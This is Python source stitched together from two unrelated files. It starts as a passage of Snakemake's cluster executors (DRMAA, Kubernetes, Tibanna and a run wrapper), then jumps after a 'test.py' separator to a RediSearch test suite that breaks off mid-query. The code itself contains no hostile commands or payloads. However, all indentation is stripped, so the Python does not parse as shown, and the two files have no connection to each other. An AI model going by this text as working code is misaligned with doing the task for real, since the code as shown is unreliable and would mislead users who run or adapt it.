from drmaa.const import JobControlAction
from drmaa.errors import InvalidJobException, InternalException
for jobid in self.submitted:
try:
self.session.control(jobid, JobControlAction.TERMINATE)
except (InvalidJobException, InternalException):
# This is common - logging a warning would probably confuse the user.
pass
self.shutdown()
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
jobscript = self.get_jobscript(job)
self.write_jobscript(job, jobscript)
try:
drmaa_args = job.format_wildcards(
self.drmaa_args, cluster=self.cluster_wildcards(job)
)
except AttributeError as e:
raise WorkflowError(str(e), rule=job.rule)
import drmaa
if self.drmaa_log_dir:
makedirs(self.drmaa_log_dir)
try:
jt = self.session.createJobTemplate()
jt.remoteCommand = jobscript
jt.nativeSpecification = drmaa_args
if self.drmaa_log_dir:
jt.outputPath = ":" + self.drmaa_log_dir
jt.errorPath = ":" + self.drmaa_log_dir
jt.jobName = os.path.basename(jobscript)
jobid = self.session.runJob(jt)
except (
drmaa.DeniedByDrmException,
drmaa.InternalException,
drmaa.InvalidAttributeValueException,
) as e:
print_exception(
WorkflowError("DRMAA Error: {}".format(e)), self.workflow.linemaps
)
error_callback(job)
return
logger.info(
"Submitted DRMAA job {} with external jobid {}.".format(job.jobid, jobid)
)
self.submitted.append(jobid)
self.session.deleteJobTemplate(jt)
submit_callback(job)
with self.lock:
self.active_jobs.append(
DRMAAClusterJob(job, jobid, callback, error_callback, jobscript)
)
def shutdown(self):
super().shutdown()
self.session.exit()
def _wait_for_jobs(self):
import drmaa
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for active_job in active_jobs:
with self.status_rate_limiter:
try:
retval = self.session.wait(
active_job.jobid, drmaa.Session.TIMEOUT_NO_WAIT
)
except drmaa.ExitTimeoutException as e:
# job still active
still_running.append(active_job)
continue
except (drmaa.InternalException, Exception) as e:
print_exception(
WorkflowError("DRMAA Error: {}".format(e)),
self.workflow.linemaps,
)
os.remove(active_job.jobscript)
active_job.error_callback(active_job.job)
continue
# job exited
os.remove(active_job.jobscript)
if (
not retval.wasAborted
and retval.hasExited
and retval.exitStatus == 0
):
active_job.callback(active_job.job)
else:
self.print_job_error(active_job.job)
self.print_cluster_job_error(
active_job, self.dag.jobid(active_job.job)
)
active_job.error_callback(active_job.job)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
@contextlib.contextmanager
def change_working_directory(directory=None):
""" Change working directory in execution context if provided. """
if directory:
try:
saved_directory = os.getcwd()
logger.info("Changing to shadow directory: {}".format(directory))
os.chdir(directory)
yield
finally:
os.chdir(saved_directory)
else:
yield
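# Usage sketch (hypothetical path): run a job inside its shadow directory, e.g.
#   with change_working_directory("/tmp/shadow/rule_x"):
#       run_job()
# When no directory is given, the context manager is a no-op.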
KubernetesJob = namedtuple(
"KubernetesJob", "job jobid callback error_callback kubejob jobscript"
)
class KubernetesExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
namespace,
container_image=None,
jobname="{rulename}.{jobid}",
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
cluster_config=None,
local_input=None,
restart_times=None,
keepincomplete=False,
):
exec_job = (
"cp -rf /source/. . && "
"snakemake {target} --snakefile {snakefile} "
"--force -j{cores} --keep-target-files --keep-remote "
"--latency-wait 0 "
" --attempt {attempt} {use_threads} "
"--wrapper-prefix {workflow.wrapper_prefix} "
"{overwrite_config} {printshellcmds} {rules} --nocolor "
"--notemp --no-hooks --nolock "
)
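# For illustration only (all values hypothetical), the formatted command
# executed inside the pod might look roughly like:
#   cp -rf /source/. . && snakemake results/a.txt --snakefile Snakefile \
#     --force -j1 --keep-target-files --keep-remote --latency-wait 0 \
#     --attempt 1 --force-use-threads --wrapper-prefix <prefix> \
#     --nocolor --notemp --no-hooks --nolock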
super().__init__(
workflow,
dag,
None,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
cluster_config=cluster_config,
local_input=local_input,
restart_times=restart_times,
exec_job=exec_job,
assume_shared_fs=False,
max_status_checks_per_second=10,
)
# use relative path to Snakefile
self.snakefile = os.path.relpath(workflow.snakefile)
try:
from kubernetes import config
except ImportError:
raise WorkflowError(
"The Python 3 package 'kubernetes' "
"must be installed to use Kubernetes"
)
config.load_kube_config()
import kubernetes.client
self.kubeapi = kubernetes.client.CoreV1Api()
self.batchapi = kubernetes.client.BatchV1Api()
self.namespace = namespace
self.envvars = workflow.envvars
self.secret_files = {}
self.run_namespace = str(uuid.uuid4())
self.secret_envvars = {}
self.register_secret()
self.container_image = container_image or get_container_image()
def register_secret(self):
import kubernetes.client
secret = kubernetes.client.V1Secret()
secret.metadata = kubernetes.client.V1ObjectMeta()
# create a random uuid
secret.metadata.name = self.run_namespace
secret.type = "Opaque"
secret.data = {}
for i, f in enumerate(self.workflow.get_sources()):
if f.startswith(".."):
logger.warning(
"Ignoring source file {}. Only files relative "
"to the working directory are allowed.".format(f)
)
continue
with open(f, "br") as content:
key = "f{}".format(i)
self.secret_files[key] = f
secret.data[key] = base64.b64encode(content.read()).decode()
for e in self.envvars:
try:
key = e.lower()
secret.data[key] = base64.b64encode(os.environ[e].encode()).decode()
self.secret_envvars[key] = e
except KeyError:
continue
self.kubeapi.create_namespaced_secret(self.namespace, secret)
def unregister_secret(self):
import kubernetes.client
self.kubeapi.delete_namespaced_secret(
self.run_namespace, self.namespace, body=kubernetes.client.V1DeleteOptions()
)
def shutdown(self):
self.unregister_secret()
super().shutdown()
def cancel(self):
import kubernetes.client
body = kubernetes.client.V1DeleteOptions()
with self.lock:
for j in self.active_jobs:
self.kubeapi.delete_namespaced_pod(j.jobid, self.namespace, body=body)
self.shutdown()
def run(self, job, callback=None, submit_callback=None, error_callback=None):
import kubernetes.client
super()._run(job)
exec_job = self.format_job(
self.exec_job,
job,
_quote_all=True,
use_threads="--force-use-threads" if not job.is_group() else "",
)
# Kubernetes silently does not submit a job if the name is too long
# therefore, we ensure that it is not longer than snakejob+uuid.
jobid = "snakejob-{}".format(
get_uuid("{}-{}-{}".format(self.run_namespace, job.jobid, job.attempt))
)
body = kubernetes.client.V1Pod()
body.metadata = kubernetes.client.V1ObjectMeta(labels={"app": "snakemake"})
body.metadata.name = jobid
# container
container = kubernetes.client.V1Container(name=jobid)
container.image = self.container_image
container.command = shlex.split("/bin/sh")
container.args = ["-c", exec_job]
container.working_dir = "/workdir"
container.volume_mounts = [
kubernetes.client.V1VolumeMount(name="workdir", mount_path="/workdir"),
kubernetes.client.V1VolumeMount(name="source", mount_path="/source"),
]
body.spec = kubernetes.client.V1PodSpec(containers=[container])
# fail on first error
body.spec.restart_policy = "Never"
# source files as a secret volume
# we copy these files to the workdir before executing Snakemake
too_large = [
path
for path in self.secret_files.values()
if os.path.getsize(path) > 1000000
]
if too_large:
raise WorkflowError(
"The following source files exceed the maximum "
"file size (1MB) that can be passed from host to "
"kubernetes. These are likely not source code "
"files. Consider adding them to your "
"remote storage instead or (if software) use "
"Conda packages or container images:\n{}".format("\n".join(too_large))
)
secret_volume = kubernetes.client.V1Volume(name="source")
secret_volume.secret = kubernetes.client.V1SecretVolumeSource()
secret_volume.secret.secret_name = self.run_namespace
secret_volume.secret.items = [
kubernetes.client.V1KeyToPath(key=key, path=path)
for key, path in self.secret_files.items()
]
# workdir as an emptyDir volume of undefined size
workdir_volume = kubernetes.client.V1Volume(name="workdir")
workdir_volume.empty_dir = kubernetes.client.V1EmptyDirVolumeSource()
body.spec.volumes = [secret_volume, workdir_volume]
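# Rough YAML equivalent of the pod built here (sketch, placeholders in <>):
#   spec:
#     restartPolicy: Never
#     containers:
#     - name: <jobid>
#       image: <container_image>
#       command: ["/bin/sh", "-c", "<exec_job>"]
#       workingDir: /workdir
#       volumeMounts:
#       - {name: workdir, mountPath: /workdir}
#       - {name: source, mountPath: /source}
#     volumes:
#     - name: source
#       secret: {secretName: <run_namespace>}
#     - name: workdir
#       emptyDir: {}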
# env vars
container.env = []
for key, e in self.secret_envvars.items():
envvar = kubernetes.client.V1EnvVar(name=e)
envvar.value_from = kubernetes.client.V1EnvVarSource()
envvar.value_from.secret_key_ref = kubernetes.client.V1SecretKeySelector(
key=key, name=self.run_namespace
)
container.env.append(envvar)
# request resources
container.resources = kubernetes.client.V1ResourceRequirements()
container.resources.requests = {}
container.resources.requests["cpu"] = job.resources["_cores"]
if "mem_mb" in job.resources.keys():
container.resources.requests["memory"] = "{}M".format(
job.resources["mem_mb"]
)
# capabilities
if job.needs_singularity and self.workflow.use_singularity:
# TODO this should work, but it doesn't currently because of
# missing loop devices
# singularity inside docker requires SYS_ADMIN capabilities
# see https://groups.google.com/a/lbl.gov/forum/#!topic/singularity/e9mlDuzKowc
# container.capabilities = kubernetes.client.V1Capabilities()
# container.capabilities.add = ["SYS_ADMIN",
# "DAC_OVERRIDE",
# "SETUID",
# "SETGID",
# "SYS_CHROOT"]
# Running in privileged mode always works
container.security_context = kubernetes.client.V1SecurityContext(
privileged=True
)
pod = self._kubernetes_retry(
lambda: self.kubeapi.create_namespaced_pod(self.namespace, body)
)
logger.info(
"Get status with:\n"
"kubectl describe pod {jobid}\n"
"kubectl logs {jobid}".format(jobid=jobid)
)
self.active_jobs.append(
KubernetesJob(job, jobid, callback, error_callback, pod, None)
)
def _kubernetes_retry(self, func):
import kubernetes
import urllib3
with self.lock:
try:
return func()
except kubernetes.client.rest.ApiException as e:
if e.status == 401:
# Unauthorized.
# Reload config in order to ensure token is
# refreshed. Then try again.
logger.info("trying to reauthenticate")
kubernetes.config.load_kube_config()
subprocess.run(["kubectl", "get", "nodes"])
self.kubeapi = kubernetes.client.CoreV1Api()
self.batchapi = kubernetes.client.BatchV1Api()
self.register_secret()
try:
return func()
except kubernetes.client.rest.ApiException as e:
# Both attempts failed, raise error.
raise WorkflowError(
e,
"This is likely a bug in "
"https://github.com/kubernetes-client/python.",
)
# Handling timeout that may occur in case of GKE master upgrade
except urllib3.exceptions.MaxRetryError as e:
logger.info(
"Request timed out! "
"Check your connection to the Kubernetes master. "
"The workflow will pause for 5 minutes to allow any update operations to complete."
)
time.sleep(300)
try:
return func()
except:
# Still can't reach the server after 5 minutes
raise WorkflowError(
e,
"Error 111 connection timeout, please check"
" that the k8 cluster master is reachable!",
)
def _wait_for_jobs(self):
import kubernetes
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for j in active_jobs:
with self.status_rate_limiter:
logger.debug("Checking status for pod {}".format(j.jobid))
job_not_found = False
try:
res = self._kubernetes_retry(
lambda: self.kubeapi.read_namespaced_pod_status(
j.jobid, self.namespace
)
)
except kubernetes.client.rest.ApiException as e:
if e.status == 404:
# Jobid not found
# The job is likely already done and was deleted on
# the server.
j.callback(j.job)
continue
except WorkflowError as e:
print_exception(e, self.workflow.linemaps)
j.error_callback(j.job)
continue
if res is None:
msg = (
"Unknown pod {jobid}. "
"Has the pod been deleted "
"manually?"
).format(jobid=j.jobid)
self.print_job_error(j.job, msg=msg, jobid=j.jobid)
j.error_callback(j.job)
elif res.status.phase == "Failed":
msg = (
"For details, please issue:\n"
"kubectl describe pod {jobid}\n"
"kubectl logs {jobid}"
).format(jobid=j.jobid)
# failed
self.print_job_error(j.job, msg=msg, jobid=j.jobid)
j.error_callback(j.job)
elif res.status.phase == "Succeeded":
# finished
j.callback(j.job)
body = kubernetes.client.V1DeleteOptions()
self.kubeapi.delete_namespaced_pod(
j.jobid, self.namespace, body=body
)
else:
# still active
still_running.append(j)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
TibannaJob = namedtuple(
"TibannaJob", "job jobname jobid exec_arn callback error_callback"
)
class TibannaExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
cores,
tibanna_sfn,
precommand="",
tibanna_config=False,
container_image=None,
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
local_input=None,
restart_times=None,
max_status_checks_per_second=1,
keepincomplete=False,
):
self.workflow_sources = []
for wfs in workflow.get_sources():
if os.path.isdir(wfs):
for (dirpath, dirnames, filenames) in os.walk(wfs):
self.workflow_sources.extend(
[os.path.join(dirpath, f) for f in filenames]
)
else:
self.workflow_sources.append(os.path.abspath(wfs))
log = "sources="
for f in self.workflow_sources:
log += f
logger.debug(log)
self.snakefile = workflow.snakefile
self.envvars = {e: os.environ[e] for e in workflow.envvars}
if self.envvars:
logger.debug("envvars = %s" % str(self.envvars))
self.tibanna_sfn = tibanna_sfn
if precommand:
self.precommand = precommand
else:
self.precommand = ""
self.s3_bucket = workflow.default_remote_prefix.split("/")[0]
self.s3_subdir = re.sub(
"^{}/".format(self.s3_bucket), "", workflow.default_remote_prefix
)
logger.debug("precommand= " + self.precommand)
logger.debug("bucket=" + self.s3_bucket)
logger.debug("subdir=" + self.s3_subdir)
self.quiet = quiet
exec_job = (
"snakemake {target} --snakefile {snakefile} "
"--force -j{cores} --keep-target-files --keep-remote "
"--latency-wait 0 "
"--attempt 1 {use_threads} "
"{overwrite_config} {rules} --nocolor "
"--notemp --no-hooks --nolock "
)
super().__init__(
workflow,
dag,
cores,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
local_input=local_input,
restart_times=restart_times,
exec_job=exec_job,
assume_shared_fs=False,
max_status_checks_per_second=max_status_checks_per_second,
disable_default_remote_provider_args=True,
disable_get_default_resources_args=True,
)
self.container_image = container_image or get_container_image()
self.tibanna_config = tibanna_config
def shutdown(self):
# perform additional steps on shutdown if necessary
logger.debug("shutting down Tibanna executor")
super().shutdown()
def cancel(self):
from tibanna.core import API
for j in self.active_jobs:
logger.info("killing job {}".format(j.jobname))
while True:
try:
res = API().kill(j.exec_arn)
if not self.quiet:
print(res)
break
except KeyboardInterrupt:
pass
self.shutdown()
def split_filename(self, filename, checkdir=None):
f = os.path.abspath(filename)
if checkdir:
checkdir = checkdir.rstrip("/")
if f.startswith(checkdir):
fname = re.sub("^{}/".format(checkdir), "", f)
fdir = checkdir
else:
direrrmsg = (
"All source files including Snakefile, "
+ "conda env files, and rule script files "
+ "must be in the same working directory: {} vs {}"
)
raise WorkflowError(direrrmsg.format(checkdir, f))
else:
fdir, fname = os.path.split(f)
return fname, fdir
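# Examples (hypothetical paths):
#   split_filename("/home/user/wf/rules/align.smk", "/home/user/wf")
#     -> ("rules/align.smk", "/home/user/wf")
#   split_filename("/home/user/wf/Snakefile")
#     -> ("Snakefile", "/home/user/wf")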
def remove_prefix(self, s):
return re.sub("^{}/{}/".format(self.s3_bucket, self.s3_subdir), "", s)
def handle_remote(self, target):
if isinstance(target, _IOFile) and target.remote_object.provider.is_default:
return self.remove_prefix(target)
else:
return target
def add_command(self, job, tibanna_args, tibanna_config):
# snakefile, with file name remapped
snakefile_fname = tibanna_args.snakemake_main_filename
# targets, with file name remapped
targets = job.get_targets()
if not isinstance(targets, list):
targets = [targets]
targets_default = " ".join([self.handle_remote(t) for t in targets])
# use_threads
use_threads = "--force-use-threads" if not job.is_group() else ""
# format command
command = self.format_job_pattern(
self.exec_job,
job,
target=targets_default,
snakefile=snakefile_fname,
use_threads=use_threads,
cores=tibanna_config["cpu"],
)
if self.precommand:
command = self.precommand + "; " + command
logger.debug("command = " + str(command))
tibanna_args.command = command
def add_workflow_files(self, job, tibanna_args):
snakefile_fname, snakemake_dir = self.split_filename(self.snakefile)
snakemake_child_fnames = []
for src in self.workflow_sources:
src_fname, _ = self.split_filename(src, snakemake_dir)
if src_fname != snakefile_fname: # redundant
snakemake_child_fnames.append(src_fname)
# change path for config files
self.workflow.overwrite_configfiles = [
self.split_filename(cf, snakemake_dir)[0]
for cf in self.workflow.overwrite_configfiles
]
tibanna_args.snakemake_directory_local = snakemake_dir
tibanna_args.snakemake_main_filename = snakefile_fname
tibanna_args.snakemake_child_filenames = list(set(snakemake_child_fnames))
def adjust_filepath(self, f):
if not hasattr(f, "remote_object"):
rel = self.remove_prefix(f) # log/benchmark
elif (
hasattr(f.remote_object, "provider") and f.remote_object.provider.is_default
):
rel = self.remove_prefix(f)
else:
rel = f
return rel
def make_tibanna_input(self, job):
from tibanna import ec2_utils, core as tibanna_core
# input & output
# The local snakemake command here must be run with --default-remote-prefix
# and --default-remote-provider (forced), but on the VM these options are removed.
# Snakemake on the VM therefore treats these inputs and outputs as non-remote.
# The files are transferred to the container by Tibanna before snakemake runs.
# In short, the paths on the VM must be consistent with what's in the Snakefile,
# but the actual location of the files is the S3 bucket/prefix.
# This mapping info must be passed to Tibanna.
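# For example (hypothetical bucket/prefix), with default_remote_prefix
# "mybucket/run1", an input "mybucket/run1/data/a.txt" is mapped as
#   input_source["file:///data1/snakemake/data/a.txt"] = "s3://mybucket/run1/data/a.txt"
# so the path inside the container matches the Snakefile while the data
# itself lives on S3.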
for i in job.input:
logger.debug("job input " + str(i))
logger.debug("job input is remote= " + ("true" if i.is_remote else "false"))
if hasattr(i.remote_object, "provider"):
logger.debug(
" is remote default= "
+ ("true" if i.remote_object.provider.is_default else "false")
)
for o in job.expanded_output:
logger.debug("job output " + str(o))
logger.debug(
"job output is remote= " + ("true" if o.is_remote else "false")
)
if hasattr(o.remote_object, "provider"):
logger.debug(
" is remote default= "
+ ("true" if o.remote_object.provider.is_default else "false")
)
file_prefix = (
"file:///data1/snakemake" # working dir inside snakemake container on VM
)
input_source = dict()
for ip in job.input:
ip_rel = self.adjust_filepath(ip)
input_source[os.path.join(file_prefix, ip_rel)] = "s3://" + ip
output_target = dict()
output_all = [eo for eo in job.expanded_output]
if job.log:
if isinstance(job.log, list):
output_all.extend([str(_) for _ in job.log])
else:
output_all.append(str(job.log))
if hasattr(job, "benchmark") and job.benchmark:
if isinstance(job.benchmark, list):
output_all.extend([str(_) for _ in job.benchmark])
else:
output_all.append(str(job.benchmark))
for op in output_all:
op_rel = self.adjust_filepath(op)
output_target[os.path.join(file_prefix, op_rel)] = "s3://" + op
# mem & cpu
mem = job.resources["mem_mb"] / 1024 if "mem_mb" in job.resources.keys() else 1
cpu = job.threads
# jobid, grouping, run_name
jobid = tibanna_core.create_jobid()
if job.is_group():
run_name = "snakemake-job-%s-group-%s" % (str(jobid), str(job.groupid))
else:
run_name = "snakemake-job-%s-rule-%s" % (str(jobid), str(job.rule))
# tibanna input
tibanna_config = {
"run_name": run_name,
"mem": mem,
"cpu": cpu,
"ebs_size": math.ceil(job.resources["disk_mb"] / 1024),
"log_bucket": self.s3_bucket,
}
logger.debug("additional tibanna config: " + str(self.tibanna_config))
if self.tibanna_config:
tibanna_config.update(self.tibanna_config)
tibanna_args = ec2_utils.Args(
output_S3_bucket=self.s3_bucket,
language="snakemake",
container_image=self.container_image,
input_files=input_source,
output_target=output_target,
input_env=self.envvars,
)
self.add_workflow_files(job, tibanna_args)
self.add_command(job, tibanna_args, tibanna_config)
tibanna_input = {
"jobid": jobid,
"config": tibanna_config,
"args": tibanna_args.as_dict(),
}
logger.debug(json.dumps(tibanna_input, indent=4))
return tibanna_input
def run(self, job, callback=None, submit_callback=None, error_callback=None):
logger.info("running job using Tibanna...")
from tibanna.core import API
super()._run(job)
# submit job here, and obtain job ids from the backend
tibanna_input = self.make_tibanna_input(job)
jobid = tibanna_input["jobid"]
exec_info = API().run_workflow(
tibanna_input,
sfn=self.tibanna_sfn,
verbose=not self.quiet,
jobid=jobid,
sleep=0,
)
exec_arn = exec_info.get("_tibanna", {}).get("exec_arn", "")
jobname = tibanna_input["config"]["run_name"]
jobid = tibanna_input["jobid"]
# register job as active, using your own namedtuple.
# The namedtuple must at least contain the attributes
# job, jobid, callback, error_callback.
self.active_jobs.append(
TibannaJob(job, jobname, jobid, exec_arn, callback, error_callback)
)
def _wait_for_jobs(self):
# busy wait on job completion
# This is only needed if your backend does not allow using callbacks
# for obtaining job status.
from tibanna.core import API
while True:
# always use self.lock to avoid race conditions
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for j in active_jobs:
# use self.status_rate_limiter to avoid too many API calls.
with self.status_rate_limiter:
if j.exec_arn:
status = API().check_status(j.exec_arn)
else:
status = "FAILED_AT_SUBMISSION"
if not self.quiet or status != "RUNNING":
logger.debug("job %s: %s" % (j.jobname, status))
if status == "RUNNING":
still_running.append(j)
elif status == "SUCCEEDED":
j.callback(j.job)
else:
j.error_callback(j.job)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
def run_wrapper(
job_rule,
input,
output,
params,
wildcards,
threads,
resources,
log,
benchmark,
benchmark_repeats,
conda_env,
container_img,
singularity_args,
env_modules,
use_singularity,
linemaps,
debug,
cleanup_scripts,
shadow_dir,
jobid,
edit_notebook,
):
"""
Wrapper around the run method that handles exceptions and benchmarking.
Arguments
job_rule -- the ``job.rule`` member
input -- list of input files
output -- list of output files
wildcards -- so far processed wildcards
threads -- usable threads
log -- list of log files
shadow_dir -- optional shadow directory root
"""
# get shortcuts to job_rule members
run = job_rule.run_func
version = job_rule.version
rule = job_rule.name
is_shell = job_rule.shellcmd is not None
if os.name == "posix" and debug:
sys.stdin = open("/dev/stdin")
if benchmark is not None:
from snakemake.benchmark import (
BenchmarkRecord,
benchmarked,
write_benchmark_records,
)
# Change workdir if shadow defined and not using singularity.
# Otherwise, we do the change from inside the container.
passed_shadow_dir = None
if use_singularity and container_img:
passed_shadow_dir = shadow_dir
shadow_dir = None
try:
with change_working_directory(shadow_dir):
if benchmark:
bench_records = []
for bench_iteration in range(benchmark_repeats):
# Determine whether to start benchmarking in this process or to
# defer it to the spawned process. We benchmark in this process
# unless the execution is done through the ``shell:``, ``script:``,
# or ``wrapper:`` stanza.
is_sub = (
job_rule.shellcmd
or job_rule.script
or job_rule.wrapper
or job_rule.cwl
)
if is_sub:
# The benchmarking through ``benchmarked()`` is started
# in the execution of the shell fragment, script, wrapper
# etc, as the child PID is available there.
bench_record = BenchmarkRecord()
run(
input,
output,
params,
wildcards,
threads,
resources,
log,
version,
rule,
conda_env,
container_img,
singularity_args,
use_singularity,
env_modules,
bench_record,
jobid,
is_shell,
bench_iteration,
cleanup_scripts,
passed_shadow_dir,
edit_notebook,
)
else:
# The benchmarking is started here as we have a run section
# and the generated Python function is executed in this
# process' thread.
with benchmarked() as bench_record:
run(
input,
output,
params,
wildcards,
threads,
resources,
log,
version,
rule,
conda_env,
container_img,
singularity_args,
use_singularity,
env_modules,
bench_record,
jobid,
is_shell,
bench_iteration,
cleanup_scripts,
passed_shadow_dir,
edit_notebook,
)
# Store benchmark record for this iteration
bench_records.append(bench_record)
else:
run(
input,
output,
params,
wildcards,
threads,
resources,
log,
version,
rule,
conda_env,
container_img,
singularity_args,
use_singularity,
env_modules,
None,
jobid,
is_shell,
None,
cleanup_scripts,
passed_shadow_dir,
edit_notebook,
)
except (KeyboardInterrupt, SystemExit) as e:
# Re-raise the keyboard interrupt in order to record an error in the
# scheduler but ignore it
raise e
except (Exception, BaseException) as ex:
log_verbose_traceback(ex)
# this ensures that exception can be re-raised in the parent thread
lineno, file = get_exception_origin(ex, linemaps)
raise RuleException(
format_error(
ex, lineno, linemaps=linemaps, snakefile=file, show_traceback=True
)
)
if benchmark is not None:
try:
write_benchmark_records(bench_records, benchmark)
except (Exception, BaseException) as ex:
raise WorkflowError(ex)
|
test.py
|
# -*- coding: utf-8 -*-
import redis
import unittest
from hotels import hotels
import random
import time
from RLTest import Env
from includes import *
from common import getConnectionByEnv, waitForIndex, toSortedFlatList
# this test is no longer relevant
# def testAdd(env):
# if env.is_cluster():
# raise unittest.SkipTest()
# r = env
# env.assertOk(r.execute_command(
# 'ft.create', 'idx', 'schema', 'title', 'text', 'body', 'text'))
# env.assertTrue(r.exists('idx:idx'))
# env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1.0, 'fields',
# 'title', 'hello world',
# 'body', 'lorem ist ipsum'))
# for _ in r.retry_with_rdb_reload():
# prefix = 'ft'
# env.assertExists(prefix + ':idx/hello')
# env.assertExists(prefix + ':idx/world')
# env.assertExists(prefix + ':idx/lorem')
def testAddErrors(env):
env.expect('ft.create idx ON HASH schema foo text bar numeric sortable').equal('OK')
env.expect('ft.add idx doc1 1 redis 4').error().contains('Unknown keyword')
env.expect('ft.add idx doc1').error().contains("wrong number of arguments")
env.expect('ft.add idx doc1 42').error().contains("Score must be between 0 and 1")
env.expect('ft.add idx doc1 1.0').error().contains("No field list found")
env.expect('ft.add fake_idx doc1 1.0 fields foo bar').error().contains("Unknown index name")
def assertEqualIgnoreCluster(env, val1, val2):
# todo: each test that uses this function should be switched back to env.assertEqual
# once the issues on the coordinator are fixed
if env.isCluster():
return
env.assertEqual(val1, val2)
def testConditionalUpdate(env):
env.assertOk(env.cmd(
'ft.create', 'idx','ON', 'HASH',
'schema', 'foo', 'text', 'bar', 'numeric', 'sortable'))
env.assertOk(env.cmd('ft.add', 'idx', '1', '1',
'fields', 'foo', 'hello', 'bar', '123'))
env.assertOk(env.cmd('ft.add', 'idx', '1', '1', 'replace', 'if',
'@foo == "hello"', 'fields', 'foo', 'world', 'bar', '123'))
env.assertEqual('NOADD', env.cmd('ft.add', 'idx', '1', '1', 'replace',
'if', '@foo == "hello"', 'fields', 'foo', 'world', 'bar', '123'))
env.assertEqual('NOADD', env.cmd('ft.add', 'idx', '1', '1', 'replace',
'if', '1 == 2', 'fields', 'foo', 'world', 'bar', '123'))
env.assertOk(env.cmd('ft.add', 'idx', '1', '1', 'replace', 'partial', 'if',
'@foo == "world"', 'fields', 'bar', '234'))
env.assertOk(env.cmd('ft.add', 'idx', '1', '1', 'replace', 'if',
'@bar == 234', 'fields', 'foo', 'hello', 'bar', '123'))
# Ensure that conditionals are ignored if the document doesn't exist
env.assertOk(env.cmd('FT.ADD', 'idx', '666', '1',
'IF', '@bar > 42', 'FIELDS', 'bar', '15'))
# Ensure that it fails if we try again, because it already exists
env.assertEqual('NOADD', env.cmd('FT.ADD', 'idx', '666', '1',
'REPLACE', 'IF', '@bar > 42', 'FIELDS', 'bar', '15'))
# Ensure that it fails because we're not using 'REPLACE'
with env.assertResponseError():
env.assertOk(env.cmd('FT.ADD', 'idx', '666', '1',
'IF', '@bar > 42', 'FIELDS', 'bar', '15'))
def testUnionIdList(env):
# Regression test for https://github.com/RediSearch/RediSearch/issues/306
r = env
N = 100
env.assertOk(r.execute_command(
"ft.create", "test", 'ON', 'HASH',
"SCHEMA", "tags", "TAG", "waypoint", "GEO"))
env.assertOk(r.execute_command(
"ft.add", "test", "1", "1", "FIELDS", "tags", "alberta", "waypoint", "-113.524,53.5244"))
env.assertOk(r.execute_command(
"ft.add", "test", "2", "1", "FIELDS", "tags", "ontario", "waypoint", "-79.395,43.661667"))
r.cmd('ft.search', 'test', '@tags:{ontario}')
res = r.execute_command(
'ft.search', 'test', "@waypoint:[-113.52 53.52 20 mi]|@tags:{ontario}", 'nocontent')
env.assertEqual(res, [2, '2', '1'])
def testAttributes(env):
env.assertOk(env.cmd('ft.create', 'idx','ON', 'HASH',
'schema', 'title', 'text', 'body', 'text'))
env.assertOk(env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields',
'title', 't1 t2', 'body', 't3 t4 t5'))
env.assertOk(env.cmd('ft.add', 'idx', 'doc2', 1.0, 'fields',
'body', 't1 t2', 'title', 't3 t5'))
res = env.cmd(
'ft.search', 'idx', '(@title:(t1 t2) => {$weight: 0.2}) |(@body:(t1 t2) => {$weight: 0.5})', 'nocontent')
env.assertListEqual([2L, 'doc2', 'doc1'], res)
res = env.cmd(
'ft.search', 'idx', '(@title:(t1 t2) => {$weight: 2.5}) |(@body:(t1 t2) => {$weight: 0.5})', 'nocontent')
env.assertListEqual([2L, 'doc1', 'doc2'], res)
res = env.cmd(
'ft.search', 'idx', '(t3 t5) => {$slop: 4}', 'nocontent')
env.assertListEqual([2L, 'doc2', 'doc1'], res)
res = env.cmd(
'ft.search', 'idx', '(t5 t3) => {$slop: 0}', 'nocontent')
env.assertListEqual([1L, 'doc2'], res)
res = env.cmd(
'ft.search', 'idx', '(t5 t3) => {$slop: 0; $inorder:true}', 'nocontent')
env.assertListEqual([0], res)
def testUnion(env):
N = 100
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx','ON', 'HASH', 'schema', 'f', 'text'))
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world' if i % 2 == 0 else 'hallo werld'))
for _ in r.retry_with_rdb_reload():
waitForIndex(r, 'idx')
res = r.execute_command(
'ft.search', 'idx', 'hello|hallo', 'nocontent', 'limit', '0', '100')
env.assertEqual(N + 1, len(res))
env.assertEqual(N, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello|world', 'nocontent', 'limit', '0', '100')
env.assertEqual(51, len(res))
env.assertEqual(50, res[0])
res = r.execute_command('ft.search', 'idx', '(hello|hello)(world|world)',
'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(51, len(res))
env.assertEqual(50, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hello|hallo)(werld|world)', 'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(101, len(res))
env.assertEqual(100, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hallo|hello)(world|werld)', 'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(101, len(res))
env.assertEqual(100, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hello|werld)(hallo|world)', 'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(101, len(res))
env.assertEqual(100, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hello|hallo) world', 'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(51, len(res))
env.assertEqual(50, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hello world)|((hello world)|(hallo world|werld) | hello world werld)',
